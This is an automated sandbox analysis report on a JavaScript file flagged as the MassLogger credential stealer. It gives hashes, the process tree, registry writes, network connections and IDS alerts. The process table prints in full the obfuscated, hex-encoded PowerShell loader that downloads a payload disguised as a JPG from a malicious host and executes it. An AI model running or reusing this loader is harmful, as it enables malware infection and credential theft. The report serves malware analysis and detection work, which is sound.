| File name: | listino.js |
| Full analysis: | https://app.any.run/tasks/eb3bd415-5d81-4531-b79b-5e8144c89474 |
| Verdict: | Malicious activity |
| Threats: | MassLogger is a credential stealer and keylogger first identified in April 2020. It has been actively used in cyber campaigns to exfiltrate sensitive information from compromised systems. It is designed for easy use by less tech-savvy actors and is prominent for the capability of spreading via USB drives. It targets both individuals and organizations in various industries, mostly in Europe and the USA. |
| Analysis date: | September 30, 2020, 06:57:11 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 3C6E786AA1A6A6806097098A36E9474F |
| SHA1: | 95593098F05C0B73B6CB7B351B4A4BAA3FA97254 |
| SHA256: | 32E2481B734C2681136614403FADE84F53691988822681FA420A947835F4F1F5 |
| SSDEEP: | 96:obNCzLfeU5UhrWFACblh3yPqod0KP6aHZ8lWAsjAtJNJOpS/j8pv:obMzLmU5Uhr5CblhCPqCPpAtjUpQa |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2520 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\listino.js" | C:\Windows\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 3600 | PoWershell $VFrJG='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@D2@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@83@15@F2@27@76@E2@37@F6@96@86@36@56@07@B6@E2@56@47@96@57@37@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@F6@05@56@36@96@67@27@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@B3@92@23@73@03@33@02@C2@D5@56@07@97@45@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@E2@47@56@E4@E2@D6@56@47@37@97@35@B5@82@47@36@56@A6@26@F4@F6@45@A3@A3@D5@D6@57@E6@54@B5@02@D3@02@23@23@07@42@B3@92@76@E6@96@07@42@82@02@C6@96@47@E6@57@02@D7@47@56@96@57@15@D2@02@13@02@47@E6@57@F6@36@D2@02@D6@F6@36@E2@56@C6@76@F6@F6@76@02@07@D6@F6@36@D2@02@E6@F6@96@47@36@56@E6@E6@F6@36@D2@47@37@56@47@02@D3@02@76@E6@96@07@42@B7@02@F6@46@B3@56@E6@F6@26@45@42@02@D4@02@C6@16@37@B3@92@72@94@72@C2@72@E3@72@82@56@36@16@C6@07@56@27@E2@72@85@54@E3@72@D3@56@E6@F6@26@45@42';$text =$VFrJG.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\PoWershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 4000 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | PoWershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Framework installation utility Exit code: 0 Version: 4.7.3062.0 built by: NET472REL1 Modules
| |||||||||||||||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\13B\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3600) PoWershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWershell_RASMANCS |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3600 | PoWershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z1707FY6HROTQ29JG25N.temp | — | |
MD5:— | SHA256:— | |||
| 3600 | PoWershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bc6db.TMP | binary | |
MD5:— | SHA256:— | |||
| 3600 | PoWershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4000 | InstallUtil.exe | GET | 200 | 50.19.252.36:80 | http://api.ipify.org/ | US | text | 14 b | shared |
3600 | PoWershell.exe | GET | 200 | 5.189.152.112:80 | http://suite.kpechios.gr/Q8.jpg | DE | text | 2.44 Mb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3600 | PoWershell.exe | 5.189.152.112:80 | suite.kpechios.gr | Contabo GmbH | DE | malicious |
4000 | InstallUtil.exe | 50.19.252.36:80 | api.ipify.org | Amazon.com, Inc. | US | malicious |
4000 | InstallUtil.exe | 94.127.7.174:21 | milebgd.mycpanel.rs | Serbia BroadBand-Srpske Kablovske mreze d.o.o. | RS | malicious |
4000 | InstallUtil.exe | 94.127.7.174:33102 | milebgd.mycpanel.rs | Serbia BroadBand-Srpske Kablovske mreze d.o.o. | RS | malicious |
Domain | IP | Reputation |
|---|---|---|
google.com |
| malicious |
suite.kpechios.gr |
| malicious |
api.ipify.org |
| shared |
milebgd.mycpanel.rs |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
3600 | PoWershell.exe | A Network Trojan was detected | SUSPICIOUS [PTsecurity] HEX Encoded Payload |
4000 | InstallUtil.exe | Misc activity | SUSPICIOUS [PTsecurity] External IP Lookup (possible MassLogger) |
4000 | InstallUtil.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org |
4000 | InstallUtil.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |